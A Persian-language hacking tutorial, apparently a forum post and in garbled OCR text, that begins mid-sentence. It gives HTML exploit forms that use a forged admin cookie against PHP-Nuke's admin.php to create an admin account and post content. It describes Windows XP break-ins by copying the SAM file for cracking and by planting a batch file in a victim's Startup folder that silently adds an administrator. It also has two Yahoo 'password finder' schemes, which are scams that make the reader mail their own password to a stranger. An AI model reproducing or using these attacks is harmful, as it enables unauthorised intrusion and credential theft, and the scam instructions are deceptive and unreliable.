وجود داره. خوب بعد از این کار گوگل کلی سایت که از سيستم phpnuke این ماژول در تمامی ورژن های
استفاده ميکنن مياره برید روی یکی از لينکها کليک کنيد وقتی سایت باز شد باید ببينيد که phpnuke
چيه ممکنه به این شکلها باشه: phpnuke شاخه
http://www.sitename.com/phpnuke/mod...?name=Downloads
www.sitename.com/html/modules.php?name=Downloads
http://www.sitename.com/portal/modu...?name=Downloads
www.sitename.com/modules.php?name=Downloads
رو سایت باشه admin.php برای اینکه بتونيم از این روش سایتها رو هک کنيم باید فایل
اینو پاک کنين و جاش بنویسيد modules.php?name=Downloads : برای اینکه بدونين هست یا نه آد
www.sitename.com/admin.php : مثلآ admin.php
برخورد کردید معلوم Error اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با
بود که به مرحله بعدی ميرید اگر ه م admin.php رو برداشته . اگه admin.php ميشه که مدیر سایت فایل
نبود اون سایت رو بی خيال شيد.
وجود داره . من به شما چند تا باگ ميدم که از طریق اونا شما admin.php خوب حالا ما فرض ميکنيم که
بتونين به سيستم مدیریت سایت نفوذ کنيد و به ر احتی بتونين سيستم مدیریت سایت رو به دست
گزینه File رو باز کنيد کد رو داخلش بنویسيد و از منویه Notepad بگيرید. شما برای اجرای این کد ها
کنيد البته بعد از اینکه نام فایل رو Save رو انتخاب کنيد و هر کجا که ميخواین با نام دلخواه تون Save As
آدرس [sitename] باز کنيد و به جای Notepad بزارید. بعد فایلتونو داخل HTML نوشتيد پسوند اونو
سایتی رو که ميخواین هک کنين رو بنویسيد.
کد اول : با استفاده از این ميتونين داخل سایت یه کاربر با امکانات ادمين سایت ایجاد کنيد و سپس
وارد سيستم مدیریت سایت بشيد و سایت رو هک کنيد.
>form name="mantra" method="POST"
action"=http://www.sitename.com/admin.php <"USERNAME> :input type="text"
name="add_aid><"br <NOME> :input type="text" name="add_name><"br <PASSWORD :
>input type="text "name="add_pwd><"br <E-MAIL> :input type="text "
name="add_email><"br> <input type="hidden" name="admin "
value="eCcgVU5JT04gU0VMRUNUIDEvKjox><"br> <input type="hidden "
name="add_radminsuper" value="1><"br> <input type="hidden" name="op "
value="AddAuthor/><"p> <input type="submit" name="Submit "value="Create Admin><"br <
/>form <
کد دوم: با این کد ميتونين یه خبر رو بدونه ورود به سيستم مدیریت به سایت بفرستيد.
>form name="mantra" method="POST"
action"=http://www.sitename.com/admin.php> <"p<TITLE> :input type="text"
name="add_title> <"br <CONTENT> :textarea name="add_content" rows=10
cols=50/><textarea> <br <DATE> :input type="text" name="add_mdate> <"br <E-MAIL :
>input type="text" name="add_expire> <"br> <input type="hidden "name="add_expire"
value="0> <"br> <input type="hidden "name="add_active" value="1> <"br> <input
type="hidden "name="add_view" value="1> <"br> <input type="hidden" name="admin "
value="eCcgVU5JT04gU0VMRUNUIDEvKjox> <"br> <input type="hidden "
name="add_radminsuper" value="1> <"br> <input type="hidden "name="op"
value="addmsg/> <"p> <p> <input type="submit "name="Submit" value="Post this
message> <"br/> <p <
کد سوم: این کد هم تقریبآ مثل کد بالا عمل ميکنه.
>form name="mantra" method="POST"
action"=http://www.sitename.com/admin.php> <"p<TITLE> :input type="text"
name="title> <"br <CONTENT> :textarea name="content" rows=10 cols=50/><textarea <
>br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox <"
>br> <input type="hidden" name="add_radminsuper" value="1> <"br> <input type="hidden"
name="op" value="massmail_send/> <"p> <p> <input type="submit" name="Submit"
value="Send to target site newsletter> <"br/> <p/> <form <
از این روش اميدوارم به کارتون بخوره اگه کسی روش phpnuke خوب اینم از آموزش هک کردن سایتهای
استفاده phpnuke دیگه ای بلد هست اینجا بگه ممون راستی اگه می خواین سایت های ایرانی که از
را بنویسيد . Farsi project by PHP-Nuke برید و عبارت google می کنند را پيدا کنيد کافيه به

شما همگی از امروز متوانيد هر آی دی را که در سایت یاهو می باشد را هک کنيد . البته این عمل برای
آی دی هایی هست که از شش ماه بيشتر ساخته شده اند . یهنی کسی که مخواهد هک کند آی
دیش شش ماه و بيشتر باشد. شما با ساده ترین روش می توانيد هک کنيد .
١- ابتدا به ميل باکس شش ماه و بيشتر خود رفته و کامپوز را زده و آماده فرستادن یک ميل جدید
باشيد.
٢- در داخل جعبه ( تو ) آدرس ميلی که می نویسم را بنویسيد. این ميل مربوط به یاهو می باشد و
وظيفه تشخيص سری رمز های عبور را دارد و با تغيير کدی که من به شما می دم یک راست می
رود سراغ پرونده ی ای دی ها .
aghs_66@yahoo.com
٣- در جعبه بادی یا نوشتن پيام ها دستورات زیر را به ترتيب در خطوط پشت سر هم بنویسيد:
%pass%
Code Name % : 15234ghnv^7458
ID : name
ID : MY NAME
pASS : mAY PASS
جای نام در خط سوم نام آی دی مورد نظر را نوشته و جای مای نام در خط چهارم ای دی شش ماهه و
یاهو ثبت LOGGER بيشتر خود را نوشته و در جای مای پس پسورد خود را نوشته تا مشخصات شما در
شود. البته به شما هيچ آسيبی نمی رسد.

جديدترين و موثر ترين راه برای يافتن پسوورد ايميل افراد:
ايميل شويد سپس: compose ابتدا وارد قسمت
proxify_id_hide@yahoo.com : اين عبارت را وارد کنيد to ١- در قسمت
البته در اين قسمت هر عبارتی وارد کنيد فرقی نمی کند). ) find IP : وارد کنيد subject ٢- در قسمت
٣- حال متن ايميل را به صورت زير بنويسيد : ابتدا در خط اول آدرس ايميل شخصی که می خواهيد
هک کنيد را بنويسيد . در خط دوم عبارت زير را بدون اشتباه تايپ کنيد (برای اطمينان از همينجا
می شود کپی پيست کرد
(from 66.218.69.8) Hmailer8.bulk.scd.yahoo.com
٤- در خط سوم پسورود ايميل خود را بنويسيد (برای چک کردن عضویت شما در یاهو و اینکه آیا شما
بيش از سه ماه عضویت دارید یا خير).
٥- در خط چهارم عبارت زير:
[٦٦٫٢١٨٫٦٦٫١٢٠]by n25.grp.scd.yahoo.com with
NNFMP/ym/Compose?To=20040213092556.77183.qmail@web20728.mail.yahoo.com
٦- در خط پنجم به تعداد ٩ ستاره تايپ کنيد به اين صورت : ********* کار تمام است ...
را بزنيد . پس از حداکثر ٤٨ ساعت شما ايميلی دريافت خواهيد کرد که حاوی send ٧- حال دکمه
پسوورد قربانی خواهد بود.
٨- نکات: در اين روش شخص قربانی به هيچ وجه از اينکه توسط شم ا هک شده است مطلع نخواهد
شد. در صورتی که پسوورد شخص قربانی بيشتر از ٩ رقم باشد اين پسوورد در دو ايميل جداگانه
برای شما فرستاده خواهد شد به اين صورت که در يک ايميل ٩ رقم اول و در ايميل دوم رقمهای
بعدی. جالب است که ياهو بسيار تلاش می کند تا جلوی يافتن پسوورد ديگران را بگيرد ولی باز
هم راههای زيادی وجود دارد که خود ياهو پسوورد افراد را به شخص هکر تقديم می کند.

: XP روش های نفوذ به
روش اول: »
را دو مرتبه Alt+Ctrl+Del پرسيده می شود کليد های UserName , Password در جایی که از شم ا
را وارد کرده و جای کلمه عبور را خالی Administrator کلمه UserName همزمان فشار دهيد. در قسمت
بزنيد تا وارد ویندوز شوید... Enter بگذارید و
آن کلمه عبوری قرار داده Administrator خوب این روش ساده بود اما هميشه کارساز نيست اگر برای
شده باشد ؟ !!
روش دوم: »
می سازیم. Bootable ١- ابتدا یک فلاپی
که با فلاپی راه اندازی Dos است و در محيط شبيه NTFS از نوع XP, ٢- اغلب فایل سيستم ویندوز 2000
داریم . (این NTFS4DOS ميشود شناخته نمی شود. بنابراین ما برای این کار نياز به برنامه هایی مثل
به ما می دهد). dos را در Ntfs نوع برنامه ها امکان کار کردن با درایو هایی که فایل سيستم آنها
سيستم تنظيم شده Setup ٣- حالا که فلاپی آماده شد باید با آن سيستم را راه اندازی کرد... اما اگر در
رفت و در آن تنظيمات لازم را Setup باشد که با فلاپی راه اندازی نش ود ...؟!! آنگاه باید به سراغ
انجام دهيم.
٤- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سيستم را با آن راه اندازی می
دسترسی داشته باشيم. NTFS را اجرا می کنيم تا به اطلاعات درایو های NTFS4DOS کنيم و بر نامه
٥- درایوی که ویندوز در آن نصب است را پيدا می کنيم و به مسير زیر رفته:
%Windir%\System32\Config\
نصب شده است: c برای مثال اگر ویندوز در رایو
Example : c:\windows\system32\config
را در فلاپی کپی می کنيم. * sam ٦- در این پوشه فایلی به نام
آن را کرک ميکنيم تا پسورد را L0phtCrack , John the Ripper ٧- بعد از کپی فایل با برنامه هایی نظير
به دست آورد.
روش سوم: »
در این روش چهار مرحله اول روش دوم را انجام ميدهيم.
ذخيره ميکنيم : test.bat می نویسيم و در فایلی با نام و پسوند Notepad ١- دستورات زیر را در
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@
٢- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپيوتر قربانی می رویم و فایلی که در مرحله
نصب باشد و کاربری با C قبل ساخته ایم را در مسير زیر کپی می کنيم (به فرض که ویندوز در درایو
مدیر سيستم باشد: MOJTABA نام
C:\Documents and Settings\MOJTABA\Start Menu\Programs\Startup
یک بار وارد شود دیگر تمام است و MOJTABA ٣- خوب حالا فقط کافی است که منتظر بمانيد تا کاربر
و کلمه عبور ١٢٣ وارد سيستم شوید. Administrator شما بعد از آن می توانيد با نام کاربری
توضيح دستورات مربوط به فایلی که ميسازیم: در خط اول این دستور باعث مخفی شدن بقيه دستورات
و کلمه عبور ١٢٣ می Administrator در حال اجرا از دید کاربر می شود. در خط دوم ما یک کاربر بانام
را تغيير داده باشند ). در Administrator سازیم. (این عمل برای این صورت می گيرد که ممکن است نام
خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمين ) سيستم قر ار ميدهيم . در
را تغيير داده نشده باشد ، پس ما فقط پسورد آن را Administrator خط چهارم احتمال می دهيم که نام
عوض می کنيم . در خط پنجم برای از بين بردن رد پا فایلی را که ساخته ایم را پاک می کنيم . در خط
ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانيم.
و کلمه عبور ١٢٣ هر کاربر یا کلمه عبور دیگری می Administrator نکته: توجه کنيد که به جای کاربر
توانيد قرار دهيد اما این کاربر کمتر باعث شک می شود.